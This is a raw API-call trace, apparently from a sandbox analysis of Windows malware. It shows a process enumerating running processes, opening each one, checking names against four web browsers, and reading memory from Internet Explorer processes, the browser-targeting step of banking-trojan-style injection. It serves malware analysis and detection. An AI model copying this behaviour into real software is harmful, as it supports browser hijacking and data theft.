	[0198.476] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.476] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0198.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.477] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.477] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0198.478] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x1654
	[0198.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.478] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0198.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.478] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.478] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0198.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.479] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.479] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0198.480] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x1658
	[0198.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.480] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0198.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.481] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.481] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0198.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.482] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.482] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0198.483] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x165c
	[0198.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.483] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0198.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.483] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.483] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0198.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.483] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.484] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0198.484] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x1660
	[0198.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.484] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0198.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.485] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.485] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0198.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.486] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.486] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0198.487] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x1664
	[0198.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.487] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0198.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.488] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.489] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0198.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.489] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.490] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0198.491] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x1668
	[0198.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.491] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0198.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.491] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.492] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0198.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.492] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.493] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0198.493] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x166c
	[0198.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.494] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0198.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.494] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.494] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0198.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.495] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.495] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0198.496] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x1670
	[0198.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.496] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0198.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.497] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.497] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0198.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.497] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.498] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0198.499] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x1674
	[0198.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.499] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0198.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.500] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.500] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0198.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.501] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.501] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0198.502] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x1678
	[0198.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.502] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0198.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.502] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.503] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0198.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.503] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.504] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0198.504] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x167c
	[0198.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.505] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0198.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.505] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.506] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0198.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.506] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.507] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0198.508] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x1680
	[0198.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.508] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0198.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.508] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.509] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0198.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.509] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.509] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0198.510] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x1684
	[0198.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.510] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0198.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.511] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0198.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.511] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0198.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.511] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.512] NtQueryInformationProcess (in: ProcessHandle=0x1684, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0198.512] ReadProcessMemory (in: hProcess=0x1684, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0198.512] ReadProcessMemory (in: hProcess=0x1684, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0198.512] ReadProcessMemory (in: hProcess=0x1684, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0198.512] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0198.512] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0198.513] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x1688
	[0198.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.513] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0198.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.513] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0198.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.513] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0198.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.514] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.514] NtQueryInformationProcess (in: ProcessHandle=0x1688, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0198.514] ReadProcessMemory (in: hProcess=0x1688, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0198.514] ReadProcessMemory (in: hProcess=0x1688, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0198.514] ReadProcessMemory (in: hProcess=0x1688, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0198.514] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0198.514] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0198.515] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x168c
	[0198.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.515] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0198.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.515] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.516] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0198.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.516] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.516] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0198.517] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x1690
	[0198.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.517] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0198.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.517] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.518] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0198.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.518] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.518] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.519] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x1694
	[0198.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.519] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.519] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.520] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.520] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.520] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.521] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0198.521] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb98) returned 0x1698
	[0198.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.522] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.522] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.522] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.523] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.523] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.523] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x169c
	[0198.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.524] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.524] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.524] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.524] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.525] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0198.525] CloseHandle (hObject=0x188) returned 1
	[0198.525] Sleep (dwMilliseconds=0x64) 
	[0198.634] GetCurrentProcessId () returned 0x110
	[0198.634] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0198.636] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0198.637] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0198.638] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0198.638] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x16a0
	[0198.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.639] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0198.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.639] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.639] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0198.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.639] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.640] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0198.640] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x16a4
	[0198.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.640] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0198.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.641] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.641] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0198.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.641] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
